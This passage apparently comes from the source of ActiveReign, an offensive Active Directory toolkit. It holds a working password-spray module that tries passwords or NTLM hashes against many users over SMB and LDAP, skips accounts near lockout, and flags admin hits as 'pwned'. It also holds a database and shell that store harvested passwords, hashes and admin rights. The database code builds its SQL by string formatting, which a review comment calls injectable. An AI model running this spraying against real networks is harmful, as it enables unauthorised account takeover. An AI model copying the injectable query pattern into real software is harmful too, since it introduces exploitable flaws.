                    # Compare and create the user list, skipping accounts
                    # that are one failure away from lockout.
                    for user, data in tmp_users.items():
                        try:
                            if user.lower() == context.user.lower():
                                logger.status_success2(["Removed User: {}".format(context.user), "(Query User)"])
                            elif db_obj.pwd_check(context.domain.lower(), user.lower()):
                                logger.status_success2(["Removed User: {}".format(user), "(Pwd Known)"])
                            elif int(data['badPwdCount']) >= (lockout_threshold - 1):
                                logger.status_success2(["Removed User: {}".format(user), "(BadPwd: {})".format(data['badPwdCount'])])
                            else:
                                users.append(user)
                        except:
                            # No badPwdCount value exists for this account.
                            users.append(user)
                    args.user = users
                    logger.status_success('{}/{} users collected'.format(len(args.user), len(tmp_users)))
            ########################################
            # Get targets via LDAP
            ########################################
            if args.ldap:
                args.target = list(l.computer_query(False, False).keys())
                logger.status_success('{} computers collected'.format(len(args.target)))
            l.close()
        except Exception as e:
            logger.fail("Ldap Connection Error: {}".format(str(e)))
            exit(1)
    return args
from os import _exit
from time import sleep
from argparse import Namespace
from threading import Thread, activeCount
from ar3.core.smb import SmbCon
from ar3.logger import highlight
from ar3.core.ldap import LdapCon
from ar3.helpers.misc import get_timestamp
def main(args, config_obj, db_obj, loggers):
    """Spray entry point: try each password against every user on every target.

    One daemon thread is spawned per (target, user) attempt via spray();
    the live thread count is throttled to args.max_threads and fully
    drained before the next password round begins.
    """
    for passwd in args.passwd:
        # Indicate start of this password round (hash vs. cleartext banner)
        if args.hash:
            loggers['console'].info("\033[1;30mPerforming Password Spray @ {} [Users: {}] [Hash: True] [Method: {}]\033[0m".format(get_timestamp(), len(args.user), args.method))
        else:
            loggers['console'].info("\033[1;30mPerforming Password Spray @ {} [Users: {}] [Password: {}] [Method: {}]\033[0m".format(get_timestamp(),len(args.user), passwd, args.method))
        # Start
        for target in args.target:
            for user in args.user:
                # Last minute adjustments to spray values.
                # Order matters: the combo split runs first, then the
                # user-as-pass / hash overrides may replace the password.
                if args.combo:
                    # NOTE(review): assumes every combo entry contains
                    # exactly one ':'; a malformed line raises ValueError.
                    user, passwd = user.split(':')
                if args.user_as_pass:
                    passwd = user.strip()
                elif args.hash:
                    # Hash auth: blank the password for this attempt.
                    passwd = ''
                # Create new namespace to pass to the spray handler
                auth_args = Namespace(user = user,
                                      passwd = passwd,
                                      hash = args.hash,
                                      domain = args.domain,
                                      local_auth = args.local_auth,
                                      debug = args.debug,
                                      timeout = args.timeout,
                                      method = args.method,
                                      mode = args.mode,
                                      user_as_pass = args.user_as_pass,
                                      jitter = args.jitter
                                      )
                t= Thread(target=spray, args=(auth_args, loggers, db_obj, config_obj, target, user, passwd,))
                t.daemon=True
                t.start()
                # Throttle: block until a thread slot frees up.
                while activeCount() > args.max_threads:
                    sleep(0.001)
    # Drain all outstanding attempts before returning.
    while activeCount() > 1:
        sleep(0.001)
def spray(auth_args, loggers, db_obj, config_obj, target, user, passwd):
    """Single authentication attempt against one target; logs the outcome.

    Runs in its own daemon thread (see main). Failures are classified by
    substring-matching the text of the exception raised by the SMB/LDAP
    layer (expired / locked / connection error / bad creds / other).
    """
    try:
        if auth_args.method.lower() == "ldap":
            con = LdapCon(auth_args, loggers, target, db_obj)
            con.create_ldap_con()
        elif auth_args.method.lower() == 'smb':
            con = SmbCon(auth_args, loggers, target, db_obj)
            con.create_smb_con()
        # Show the hash (not the blanked password) in success output.
        if auth_args.hash: passwd = auth_args.hash
        # con.admin is only set by some connection types; admin access
        # gets the configured "pwned" banner instead of plain SUCCESS.
        if hasattr(con, 'admin')and con.admin == True:
            loggers['console'].success([con.host, con.ip, auth_args.method.upper(), '{}\\{:<20} {:<15} {}'.format(con.domain, user, passwd, highlight(config_obj.PWN3D_MSG, 'yellow'))])
        else:
            loggers['console'].success([con.host, con.ip, auth_args.method.upper(),'{}\\{:<20} {:<15} {}'.format(con.domain, user, passwd, highlight("SUCCESS", "green"))])
        loggers[auth_args.mode].info("[{}]\tSpray\t{}\t{}\\{}\t{}\tSuccess".format(get_timestamp(), target, auth_args.domain, user, passwd))
        con.close()
    except KeyboardInterrupt:
        print("\n[!] Key Event Detected, Closing...")
        try:
            con.close()
        except:
            pass
        # Hard-exit the whole process from this worker thread.
        _exit(0)
    except Exception as e:
        # Overwrite pwd value for output
        if auth_args.hash: passwd = auth_args.hash
        # NOTE(review): 'con' may be unbound in this handler if the
        # constructor itself raised; the expired branch below reads
        # con.host / con.ip — confirm the constructors cannot raise.
        if "password has expired" in str(e).lower():
            loggers['console'].success2([con.host, con.ip, auth_args.method.upper(), '{}\\{:<20} {:<15} {}'.format(auth_args.domain, user, passwd, highlight("PASSWORD EXPIRED", color='yellow'))])
            loggers[auth_args.mode].info("[{}]\tSpray\t{}\t{}\\{}\t{}\tPassword Expired".format(get_timestamp(), target, auth_args.domain, user, passwd))
        elif "account_locked_out" in str(e).lower():
            loggers['console'].warning([target, target, auth_args.method.upper(), '{}\\{:<20} {:<15} {}'.format(auth_args.domain, user, passwd, highlight("ACCOUNT LOCKED", color='red'))])
            loggers[auth_args.mode].info("[{}]\tSpray\t{}\t{}\\{}\t{}\tAccount Locked".format(get_timestamp(), target, auth_args.domain, user, passwd))
        elif str(e) == "Connection to Server Failed":
            loggers['console'].verbose([target, target, auth_args.method.upper(), '{}\\{:<20} {:<15} {}'.format(auth_args.domain, user, passwd, highlight("CONNECTION ERROR", color='red'))])
            loggers[auth_args.mode].info("[{}]\tSpray\t{}\t{}\\{}\t{}\tConnection Error".format(get_timestamp(), target, auth_args.domain, user, passwd))
        elif "status_logon_failure" in str(e).lower() or "invalidCredentials" in str(e).lower():
            loggers['console'].verbose([target, target, auth_args.method.upper(), '{}\\{:<20} {:<15} {}'.format(auth_args.domain, user, passwd, highlight("FAILED", color='red'))])
            loggers[auth_args.mode].info("[{}]\tSpray\t{}\t{}\\{}\t{}\tLogin Failed".format(get_timestamp(), target, auth_args.domain, user, passwd))
        else:
            # Unrecognized error: only shown in debug output.
            loggers['console'].debug([target, target, auth_args.method.upper(), '{}\\{:<20} {:<15} {}'.format(auth_args.domain, user, passwd, highlight(str(e), color='red'))])
            loggers[auth_args.mode].info("[{}]\tSpray\t{}\t{}\\{}\t{}\t{}".format(get_timestamp(), target, auth_args.domain, user, passwd, str(e)))
    # Per-attempt delay to slow the spray (0 disables it).
    sleep(auth_args.jitter)
    del auth_args
import os
import logging
from cmd import Cmd
from ar3.ops.db import db_query
from ar3.ops.db.db_core import Ar3db
from ar3.logger import setup_logger
class AR3DBSHELL(Cmd):
    """Interactive shell for browsing the AR3 workspace database."""

    def __init__(self, logger):
        super().__init__()
        self.prompt = "AR3DB> "
        self.logger = logger
        self.workspace = 'default'
        self.workspace_path = os.path.join(os.path.expanduser('~'), '.ar3', 'workspaces')
        self.db = Ar3db(self.workspace, self.logger, False)

    def do_workspace(self, args):
        """'workspace list' shows all workspaces; 'workspace <name>' switches."""
        if args == "list":
            for entry in os.listdir(self.workspace_path):
                self.logger.output(entry)
            return
        if not args:
            self.logger.fail("No workspace provided:")
            self.logger.output(" List Workspaces : \"workspace list\"")
            self.logger.output(" Change Workspaces : \"workspace demo.local\"")
            return
        if not os.path.exists(self.workspace_path + "/{}".format(args)):
            self.logger.fail("Invalid workspace provided: Use \"workspace list\" for more")
            return
        self.workspace = args
        self.db = Ar3db(self.workspace, self.logger, False)
        self.logger.success("Workspace changed successfully: {}".format(args))

    def do_users(self, args):
        """List all users, or look one up by id/name when an arg is given."""
        if not args:
            db_query.users(self.db, self.logger)
        else:
            db_query.user_lookup(self.db, self.logger, args)

    def do_creds(self, args):
        """List stored credentials, or look a user up when an arg is given."""
        if not args:
            db_query.creds(self.db, self.logger)
        else:
            db_query.user_lookup(self.db, self.logger, args)

    def do_groups(self, args):
        """List all groups, or look one up when an arg is given."""
        if not args:
            db_query.groups(self.db, self.logger)
        else:
            db_query.group_lookup(self.db, self.logger, args)

    def do_hosts(self, args):
        """List all hosts, or look one up when an arg is given."""
        if not args:
            db_query.hosts(self.db, self.logger)
        else:
            db_query.host_lookup(self.db, self.logger, args)

    def do_domains(self, args):
        """List all domains."""
        db_query.domains(self.db, self.logger)

    def do_exit(self, args):
        """Leave the shell."""
        raise SystemExit
def shell(logger):
    """Run the DB shell forever, restarting it after any crash.

    SystemExit (raised by the 'exit' command) is not an Exception, so it
    propagates and actually terminates the loop.
    """
    while True:
        try:
            AR3DBSHELL(logger).cmdloop()
        except Exception as err:
            logger.warning("AR3DB shell error: {}".format(str(err)))
def main():
    """Entry point: build a console logger and launch the DB shell."""
    shell(setup_logger(logging.INFO, 'ar3'))
from sys import exit
def db_args(sub_parser):
    """Register the 'db' sub-command and all of its options on *sub_parser*."""
    usage = """
    Insert Example:\n activereign db insert -u admin -p Password1 -d demo.local
    """
    db_parser = sub_parser.add_parser("db", description=usage, help='- Query or insert data into Ar3db')

    # Lookup options: positional action/table plus an optional row selector.
    lookup_group = db_parser.add_argument_group("Search Options")
    lookup_group.add_argument(dest='db_table', nargs='+', help='Ar3db action/table (\"ar3 db help\" for more)')
    selector = lookup_group.add_mutually_exclusive_group(required=False)
    selector.add_argument('-id', dest='id', type=int, help='Lookup row by ID')
    selector.add_argument('-n', '--name', type=str, default='', help='Lookup row by name')

    # Values consumed by the "insert" action.
    insert_group = db_parser.add_argument_group("Insert Values")
    insert_group.add_argument('-u', dest='user', type=str, default='', help='Insert User account into db')
    insert_group.add_argument('-p', dest='password', type=str, default='', help='Insert into db: Password (Default: None)')
    insert_group.add_argument('-H', '--hashes', dest='hash', type=str, default='', help='Insert into db: Hash (Default: None)')
    insert_group.add_argument('-d', dest='domain', type=str, default='', help='Insert into db: Domain')
    insert_group.add_argument('-t', '--threshold', dest='lockout_threshold', type=int, default=False, help='Domain/System Lockout Threshold')
def db_arg_mods(args, db_obj, loggers):
    """Normalize the requested db action, show help, and reject unknowns."""
    # Every action/table name the db op understands.
    valid_actions = ['insert', 'users', 'creds', 'hosts', 'computers', 'groups', 'domains', 'rebuild', 'info', 'shell', 'help']
    actions_help = """ \033[01;30mTables\n >>------------>\033[0m
    domains : List all domains
    users : List all users
    creds : List all credentials
    groups : List all groups
    computers : List all computers
    \033[01;30mOperations\n >>------------>\033[0m
    rebuild : Delete current database and wipe all data
    insert : Insert user or domain into database for enumeration
    user : ar3 db insert -u admin -p password -d demo.local
    domain : ar3 db insert -d demo.local -t 5
    """
    # Only the first positional value is meaningful; compare lowercase.
    args.db_table = args.db_table[0].lower()
    if args.db_table == 'help':
        loggers['console'].info("ActiveReign Database")
        loggers['console'].output(actions_help)
        exit(0)
    if args.db_table not in valid_actions:
        loggers['console'].fail('Invalid operation requested: \"{}\"'.format(args.db_table))
        loggers['console'].fail('Use \"ar3 db help\" to list all options'.format(args.db_table))
        exit(1)
    return args
from terminaltables import AsciiTable
def rebuild(db_obj, logger):
    """Drop and recreate the workspace database, reporting the outcome."""
    try:
        db_obj.db_rebuild()
        logger.success("Database has been rebuilt\n")
    except Exception as err:
        logger.fail(str(err))
def domains(db_obj, logger):
    """Print every row of the DOMAINS table."""
    display_data(
        db_obj.query_domains(),
        logger,
        "DOMAINS",
        [("DOMAIN ID", "DOMAIN", "LOCKOUT THRESHOLD", "LOCKOUT DURATION", "MIN PWD LENGTH", "MAX PWD AGE")],
    )
def hosts(db_obj, logger):
    """Print every HOSTS row together with its admin count."""
    columns = [("HOSTID", "DOMAIN", "HOSTNAME", "IP", "OS", "SIGNING", "ADMIN(s)")]
    display_data(db_obj.query_hosts(), logger, "HOSTS", columns)
def host_lookup(db_obj, logger, id, name=False):
    """Show one host (by id, or by name substring) plus its known admins."""
    # Build the WHERE clause: id match by default, LIKE match when a name is given.
    if name:
        where = "HOSTS.HOSTNAME LIKE '%{}%'".format(name)
    else:
        where = "HOSTS.HOSTID = '{}'".format(id)
    # Host record
    host_sql = """SELECT HOSTS.HOSTID, HOSTS.DOMAIN, HOSTS.HOSTNAME, HOSTS.IP, HOSTS.OS, HOSTS.SIGNING FROM HOSTS WHERE {};""".format(where)
    display_data(db_obj.custom_query(host_sql), logger, "HOSTS",
                 [("HOSTID", "DOMAIN", "HOSTNAME", "IP", "OS", "SIGNING")])
    # Admins known on that host
    display_data(db_obj.query_spec_host(where), logger, "ADMINS",
                 [("HOSTID", "DOMAIN", "HOSTNAME", "IP", "OS", "SIGNING", "ADMIN(s)", "USER DOMAIN", "PASSWORD", "HASH")])
def users(db_obj, logger):
    """Print every USERS row with admin-host and group-membership counts."""
    columns = [("USERID", "DOMAIN", "USERNAME", "PASSWORD", "HASH", "ADMIN ON", "MEMBER OF")]
    display_data(db_obj.query_users(), logger, "USERS", columns)
def user_lookup(db_obj, logger, id, name=False):
    """Show one user (by id, or exact username) plus their admin hosts and groups."""
    # Match on USERNAME when a name was supplied, otherwise on USERID.
    field, value = ('USERNAME', name) if name else ('USERID', id)
    lookups = (
        # The user record itself
        ("""SELECT USERS.USERID, USERS.DOMAIN, USERS.USERNAME, USERS.PASSWORD, USERS.HASH FROM USERS WHERE USERS.{} = '{}';""".format(field,value),
         "USER",
         [("USERID", "DOMAIN", "USERNAME", "PASSWORD", "HASH")]),
        # Hosts the user is a known admin on
        ("""SELECT USERS.USERID, USERS.DOMAIN, USERS.USERNAME, HOSTS.HOSTID, HOSTS.DOMAIN, HOSTS.HOSTNAME, HOSTS.IP, HOSTS.OS FROM USERS INNER JOIN ADMINS ON USERS.USERID = ADMINS.USERID INNER JOIN HOSTS ON ADMINS.HOSTID = HOSTS.HOSTID WHERE USERS.{} = '{}';""".format(field,value),
         "HOSTS",
         [("USERID", "DOMAIN", "USERNAME", "HOSTID", "HOST DOMAIN", "HOSTNAME", "IP", "OS")]),
        # Groups the user is a member of
        ("""SELECT USERS.USERID, USERS.DOMAIN, USERS.USERNAME, GROUPS.GROUPID, GROUPS.DOMAIN, GROUPS.NAME FROM USERS INNER JOIN MEMBERS_USERS ON USERS.USERID = MEMBERS_USERS.USERID INNER JOIN GROUPS ON MEMBERS_USERS.GROUPID = GROUPS.GROUPID WHERE USERS.{} = '{}';""".format(field,value),
         "GROUPS",
         [("USERID", "DOMAIN", "USERNAME", "GROUPID", "GROUP DOMAIN", "GROUP NAME")]),
    )
    for sql, title, header in lookups:
        display_data(db_obj.custom_query(sql), logger, title, header)
def creds(db_obj, logger):
    """Print users that have a stored password or hash."""
    columns = [("USERID", "DOMAIN", "USERNAME", "PASSWORD", "HASH", "ADMIN ON")]
    display_data(db_obj.query_creds(), logger, "CREDS", columns)
def groups(db_obj, logger):
    """Print every GROUPS row with user- and group-member counts."""
    columns = [("GROUPID", "DOMAIN", "NAME", "MEMBERS: USERS", "MEMBERS: GROUPS")]
    display_data(db_obj.query_groups(), logger, "GROUPS", columns)
def group_lookup(db_obj, logger, id, name=False):
    """Show one group (by id, or name substring) and both kinds of members."""
    # Match by LIKE on the name when supplied, otherwise by exact id.
    if name:
        where = "GROUPS.NAME LIKE '%{}%'".format(name)
    else:
        where = "GROUPS.GROUPID = '{}'".format(id)
    # Users that are direct members of the group
    user_sql = """SELECT GROUPS.GROUPID, GROUPS.DOMAIN, GROUPS.NAME, USERS.USERID, USERS.USERNAME, USERS.DOMAIN, USERS.PASSWORD, USERS.HASH FROM GROUPS INNER JOIN MEMBERS_USERS ON MEMBERS_USERS.GROUPID = GROUPS.GROUPID INNER JOIN USERS ON MEMBERS_USERS.USERID = USERS.USERID WHERE {};""".format(where)
    display_data(db_obj.custom_query(user_sql), logger, "MEMBERS: USERS",
                 [("GROUPID", "DOMAIN", "NAME", "USERID", "USERNAME", "USER DOMAIN", "PASSWORD", "HASH")])
    # Groups nested inside the group
    nested_sql = """SELECT GROUPS.GROUPID, GROUPS.DOMAIN, GROUPS.NAME, MEMBERS_GROUPS.GMID,(SELECT GROUPS.DOMAIN FROM GROUPS WHERE GROUPS.GROUPID = MEMBERS_GROUPS.GMID), (SELECT GROUPS.NAME FROM GROUPS WHERE GROUPS.GROUPID = MEMBERS_GROUPS.GMID) FROM GROUPS INNER JOIN MEMBERS_GROUPS ON GROUPS.GROUPID = MEMBERS_GROUPS.GROUPID WHERE {};""".format(where)
    display_data(db_obj.custom_query(nested_sql), logger, "MEMBERS: GROUPS",
                 [("GROUPID", "DOMAIN", "NAME", "GROUP MEMBER ID", "GROUP MEMBER DOMAIN", "GROUP MEMBER NAME")])
def display_data(data, logger, db_title=None, headers=''):
    """Render query results as an ASCII table via logger.output.

    data     -- list of row tuples (nothing is printed when empty/falsy)
    db_title -- optional table title
    headers  -- list containing one header tuple

    Bug fix: the default for headers is '' (a str), so the original
    `headers + data` raised TypeError whenever the default was used with
    non-empty data. Coercing both operands to lists makes the default
    behave as "no header row" while leaving all existing callers
    (which pass a list) unchanged.
    """
    if not data:
        return
    table = AsciiTable(list(headers) + list(data))
    if db_title:
        table.title = db_title
    logger.output(table.table)
from sqlite3 import connect
from os import remove, path
class Ar3db():
    """SQLite-backed store for ActiveReign enumeration results.

    One database per workspace, located at
    ~/.ar3/workspaces/<workspace>/ar3.db. Tables: DOMAINS, HOSTS, USERS,
    GROUPS, plus the join tables ADMINS (user is admin on host),
    MEMBERS_USERS (user in group) and MEMBERS_GROUPS (group nested in
    group) defined by the __sql_create_* statements below.

    NOTE(review): every statement in this class is assembled with
    str.format() rather than parameterized SQL, so values containing a
    single quote will break the query (and are injectable).
    update_group() strips quotes for this reason, but the other writers
    do not -- confirm inputs are trusted before reuse.
    """

    # Schema: one CREATE TABLE statement per table, executed by db_init().
    __sql_create_domains = ('CREATE TABLE IF NOT EXISTS DOMAINS (DOMAINID INTEGER PRIMARY KEY AUTOINCREMENT,'
                            'NAME TEXT NOT NULL,'
                            'LOCKOUT_THRESHOLD INTEGER,'
                            'LOCKOUT_DURATION TEXT,'
                            'MIN_PWD_LENGTH INTEGER,'
                            'MAX_PWD_AGE TEXT);')
    __sql_create_hosts = ('CREATE TABLE IF NOT EXISTS HOSTS (HOSTID INTEGER PRIMARY KEY AUTOINCREMENT,'
                          'HOSTNAME TEXT,'
                          'IP TEXT,'
                          'DOMAIN TEXT,'
                          'OS TEXT,'
                          'SIGNING BOOL);')
    __sql_create_users = ('CREATE TABLE IF NOT EXISTS USERS (USERID INTEGER PRIMARY KEY AUTOINCREMENT,'
                          'USERNAME TEXT NOT NULL,'
                          'PASSWORD TEXT,'
                          'DOMAIN TEXT,'
                          'HASH TEXT);')
    __sql_create_admin = ('CREATE TABLE IF NOT EXISTS ADMINS (ADMINID INTEGER PRIMARY KEY AUTOINCREMENT,'
                          'HOSTID INTEGER NOT NULL,'
                          'USERID INTEGER NOT NULL);')
    __sql_create_groups = ('CREATE TABLE IF NOT EXISTS GROUPS (GROUPID INTEGER PRIMARY KEY AUTOINCREMENT,'
                           'DOMAIN TEXT,'
                           'NAME TEXT NOT NULL);')
    __sql_create_user_members = ('CREATE TABLE IF NOT EXISTS MEMBERS_USERS (MEMBERID INTEGER PRIMARY KEY AUTOINCREMENT,'
                                 'GROUPID INTEGER NOT NULL,'
                                 'USERID INTEGER NOT NULL);')
    __sql_create_group_members = ('CREATE TABLE IF NOT EXISTS MEMBERS_GROUPS (MEMBERID INTEGER PRIMARY KEY AUTOINCREMENT,'
                                  'GROUPID INTEGER NOT NULL,'
                                  'GMID INTEGER NOT NULL);')

    def __init__(self, workspace, logger, debug=False):
        """Remember paths/logger only; no file is opened until first use."""
        self.logger = logger
        self.debug = debug
        self.db_dir = path.join(path.expanduser('~'), '.ar3', 'workspaces', workspace)
        self.dbname = path.join(self.db_dir, 'ar3.db')

    ###########################
    # DB connection/interaction
    ###########################
    def db_connect(self, dbname):
        """Open a connection to *dbname*; return False on failure."""
        try:
            return connect(dbname, timeout=3, check_same_thread=False)
        except Exception as e:
            self.logger.debug(str(e))
            return False

    def db_init(self):
        """Create the database file (if needed) and all tables; True on success."""
        try:
            con = self.db_connect(self.dbname)
            self.db_exec(con, self.__sql_create_domains)
            self.db_exec(con, self.__sql_create_hosts)
            self.db_exec(con, self.__sql_create_users)
            self.db_exec(con, self.__sql_create_admin)
            self.db_exec(con, self.__sql_create_groups)
            self.db_exec(con, self.__sql_create_user_members)
            self.db_exec(con, self.__sql_create_group_members)
            con.close()
            return True
        except Exception as e:
            # NOTE(review): stray debug print; logger.debug below already
            # records the error.
            print(e)
            self.logger.debug(str(e))
            return False

    def db_exec(self, con, query):
        """Execute *query* on *con*, commit, and return all fetched rows."""
        cur = con.cursor()
        cur.execute(query)
        data = cur.fetchall()
        con.commit()
        cur.close()
        return data

    def db_rebuild(self):
        """Delete the db file and recreate an empty schema; True on success."""
        try:
            self.db_remove()
            self.db_init()
            return True
        except:
            return False

    def db_remove(self):
        """Delete the database file from disk (raises if it does not exist)."""
        remove(self.dbname)

    def close(self,con):
        """Close a connection previously returned by db_connect()."""
        con.close()

    ###########################
    # Retrieve Unique ID
    ###########################
    def domain_id(self, con, domain):
        """Return the DOMAINID for *domain*, or False if not found."""
        try:
            return self.db_exec(con, """SELECT DOMAINID FROM DOMAINS WHERE NAME='{}' LIMIT 1;""".format(domain))[0][0]
        except:
            return False

    def host_id(self, con, host):
        """Return the HOSTID for *host* (hostname), or False if not found."""
        try:
            return self.db_exec(con, """SELECT HOSTID FROM HOSTS WHERE HOSTNAME='{}' LIMIT 1;""".format(host))[0][0]
        except:
            return False

    def user_id(self, con, username, domain):
        """Return the USERID for username@domain, or False if not found."""
        try:
            return self.db_exec(con, """SELECT USERID FROM USERS WHERE USERNAME='{}' AND DOMAIN='{}' LIMIT 1;""".format(username, domain))[0][0]
        except:
            return False

    def cred_id(self, con, username, domain, password, hash):
        """Return the USERID matching the full credential tuple, or False."""
        try:
            return self.db_exec(con, """SELECT USERID FROM USERS WHERE USERNAME='{}' AND DOMAIN='{}' AND PASSWORD='{}' AND HASH='{}' LIMIT 1;""".format(username, domain, password, hash))[0][0]
        except:
            return False

    def group_id(self, con, group_name, domain):
        """Return the GROUPID for group_name@domain, or False if not found."""
        try:
            return self.db_exec(con, """SELECT GROUPID FROM GROUPS WHERE NAME='{}' AND DOMAIN='{}' LIMIT 1;""".format(group_name, domain))[0][0]
        except:
            return False

    ###########################
    # Update records
    ###########################
    def update_domain(self, domain, lockout_threshold):
        """Upsert a domain row with only its lockout threshold."""
        con = self.db_connect(self.dbname)
        id = self.domain_id(con, domain.lower())
        if id:
            self.db_exec(con, """UPDATE DOMAINS SET NAME='{}', LOCKOUT_THRESHOLD='{}' WHERE DOMAINID={};""".format(domain.lower(), lockout_threshold, id))
        else:
            self.db_exec(con, """INSERT INTO DOMAINS (NAME, LOCKOUT_THRESHOLD) VALUES ('{}','{}');""".format(domain.lower(), lockout_threshold))
        con.close()

    def update_domain_ldap(self, domain, threshold, duration, length, age):
        # Update all values in domain policy (full upsert from LDAP data)
        con = self.db_connect(self.dbname)
        id = self.domain_id(con, domain.lower())
        if id:
            self.db_exec(con, """UPDATE DOMAINS SET NAME='{}', LOCKOUT_THRESHOLD='{}', LOCKOUT_DURATION='{}', MIN_PWD_LENGTH='{}', MAX_PWD_AGE='{}' WHERE DOMAINID={};""".format(domain.lower(), threshold, duration, length, age, id))
        else:
            self.db_exec(con, """INSERT INTO DOMAINS (NAME, LOCKOUT_THRESHOLD, LOCKOUT_DURATION, MIN_PWD_LENGTH, MAX_PWD_AGE) VALUES ('{}','{}','{}','{}','{}');""".format(domain.lower(), threshold, duration, length, age))
        con.close()

    def update_host(self, hostname, ip, domain, os, signing):
        """Upsert a host row including its SMB signing status."""
        con = self.db_connect(self.dbname)
        id = self.host_id(con, hostname.lower())
        if id:
            self.db_exec(con,"""UPDATE HOSTS SET HOSTNAME='{}', IP='{}', DOMAIN='{}', OS='{}', SIGNING='{}' WHERE HOSTID={};""".format(hostname.lower(), ip, domain.lower(), os, signing, id))
        else:
            self.db_exec(con, """INSERT OR REPLACE INTO HOSTS(HOSTNAME, IP, DOMAIN, OS, signing) VALUES ('{}','{}','{}','{}', '{}');""".format(hostname.lower(), ip, domain.lower(), os, signing))
        con.close()

    def update_host_ldap(self, hostname, ip, domain, os):
        # Update host using ldap information (no signing value available)
        con = self.db_connect(self.dbname)
        id = self.host_id(con, hostname.lower())
        if id:
            self.db_exec(con,"""UPDATE HOSTS SET HOSTNAME='{}', IP='{}', DOMAIN='{}', OS='{}' WHERE HOSTID={};""".format(hostname.lower(), ip, domain.lower(), os, id))
        else:
            self.db_exec(con, """INSERT OR REPLACE INTO HOSTS(HOSTNAME, IP, DOMAIN, OS) VALUES ('{}','{}','{}','{}');""".format(hostname.lower(), ip, domain.lower(), os))
        con.close()

    def update_user(self, username, passwd, domain, hash):
        """Upsert a user row including its password/hash credentials."""
        con = self.db_connect(self.dbname)
        id = self.user_id(con, username.lower(), domain.lower())
        if id:
            self.db_exec(con,"""UPDATE USERS SET USERNAME='{}', PASSWORD='{}', DOMAIN='{}', HASH='{}' WHERE USERID={};""".format(username.lower(), passwd, domain.lower(), hash, id))
        else:
            self.db_exec(con,"""INSERT INTO USERS (USERNAME, PASSWORD, DOMAIN, HASH) VALUES ('{}','{}','{}','{}');""".format(username.lower(), passwd, domain.lower(), hash))
        con.close()

    def update_username(self, domain, username):
        # Update username and domain values without effecting password/hash values
        con = self.db_connect(self.dbname)
        uid = self.user_id(con, username.lower(), domain.lower())
        if uid:
            self.db_exec(con, """UPDATE USERS SET USERNAME='{}', DOMAIN='{}' WHERE USERID={};""".format(username.lower(), domain.lower(), uid))
        else:
            self.db_exec(con, """INSERT INTO USERS (USERNAME, DOMAIN) VALUES ('{}','{}');""".format(username.lower(), domain.lower()))
        con.close()

    def update_user_members(self, domain, username, group_name):
        """Record user-in-group membership (no duplicates).

        NOTE(review): if either lookup fails, uid/gid is False and a
        bogus row is still inserted -- confirm callers always pass
        existing users/groups.
        """
        con = self.db_connect(self.dbname)
        uid = self.user_id(con, username.lower(), domain.lower())
        gid = self.group_id(con, group_name, domain.lower())
        self.db_exec(con, """INSERT INTO MEMBERS_USERS (GROUPID, USERID) SELECT '{0}', '{1}' WHERE NOT EXISTS(SELECT MEMBERID FROM MEMBERS_USERS WHERE GROUPID={0} AND USERID={1});""".format(gid, uid))
        con.close()

    def update_group_members(self, domain, group_member, group_name):
        """Record group-nested-in-group membership (no duplicates)."""
        con = self.db_connect(self.dbname)
        gmid = self.group_id(con, group_member, domain.lower())
        gid = self.group_id(con, group_name, domain.lower())
        self.db_exec(con, """INSERT INTO MEMBERS_GROUPS (GROUPID, GMID) SELECT '{0}', '{1}' WHERE NOT EXISTS(SELECT MEMBERID FROM MEMBERS_GROUPS WHERE GROUPID={0} AND GMID={1});""".format(gid, gmid))
        con.close()
        return

    def update_group(self, group_name, domain):
        """Upsert a group row; quotes are stripped from the name first."""
        try:
            # Strip quote characters so the formatted SQL stays valid.
            group_name = group_name.replace("'", "").replace('"', "")
            con = self.db_connect(self.dbname)
            id = self.group_id(con, group_name, domain.lower())
            if id:
                self.db_exec(con,"""UPDATE GROUPS SET DOMAIN='{}', NAME='{}' WHERE GROUPID={};""".format(domain.lower(), str(group_name), id))
            else:
                self.db_exec(con,"""INSERT INTO GROUPS (DOMAIN, NAME) VALUES ('{}','{}');""".format(domain.lower(), str(group_name)))
            con.close()
        except Exception as e:
            self.logger.debug(['DB GROUPS', group_name, domain, str(e)])

    def update_admin(self, username, domain, hostname):
        """Record that username@domain is an admin on hostname (no duplicates)."""
        con = self.db_connect(self.dbname)
        hid = self.host_id(con, hostname.lower())
        uid = self.user_id(con, username.lower(), domain.lower())
        self.db_exec(con, """INSERT INTO ADMINS (USERID, HOSTID) SELECT '{0}', '{1}' WHERE NOT EXISTS(SELECT ADMINID FROM ADMINS WHERE USERID={0} AND HOSTID={1});""".format(uid, hid))
        con.close()

    ###########################
    # General queries (Returns all data)
    ###########################
    def query_domains(self):
        """Return all DOMAINS rows, or [[]] on error."""
        try:
            con = self.db_connect(self.dbname)
            tmp = self.db_exec(con, """SELECT * FROM DOMAINS;""")
            con.close()
            return tmp
        except Exception as e:
            self.logger.debug(str(e))
            return [[]]

    def query_groups(self):
        """Return all GROUPS rows with member counts, or [[]] on error."""
        try:
            con = self.db_connect(self.dbname)
            tmp = self.db_exec(con, """SELECT GROUPS.GROUPID, GROUPS.DOMAIN, GROUPS.NAME, (SELECT (COUNT(MEMBERS_USERS.USERID)|| ' User(s)') FROM MEMBERS_USERS WHERE MEMBERS_USERS.GROUPID = GROUPS.GROUPID), (SELECT (COUNT(MEMBERS_GROUPS.GMID)|| ' Group(s)') FROM MEMBERS_GROUPS WHERE MEMBERS_GROUPS.GROUPID = GROUPS.GROUPID) FROM GROUPS ORDER BY GROUPS.NAME;""")
            con.close()
            return tmp
        except Exception as e:
            self.logger.debug(str(e))
            return [[]]

    def query_hosts(self):
        """Return all HOSTS rows with an admin count, or [[]] on error."""
        try:
            con = self.db_connect(self.dbname)
            tmp = self.db_exec(con, """SELECT HOSTS.HOSTID, HOSTS.DOMAIN, HOSTS.HOSTNAME, HOSTS.IP, HOSTS.OS, HOSTS.SIGNING, (SELECT (COUNT(ADMINS.USERID) || ' User(s)') FROM ADMINS WHERE ADMINS.HOSTID = HOSTS.HOSTID) FROM HOSTS;""")
            con.close()
            return tmp
        except Exception as e:
            self.logger.debug(str(e))
            return [[]]

    def query_users(self):
        """Return all USERS rows with admin/group counts, or [[]] on error."""
        try:
            con = self.db_connect(self.dbname)
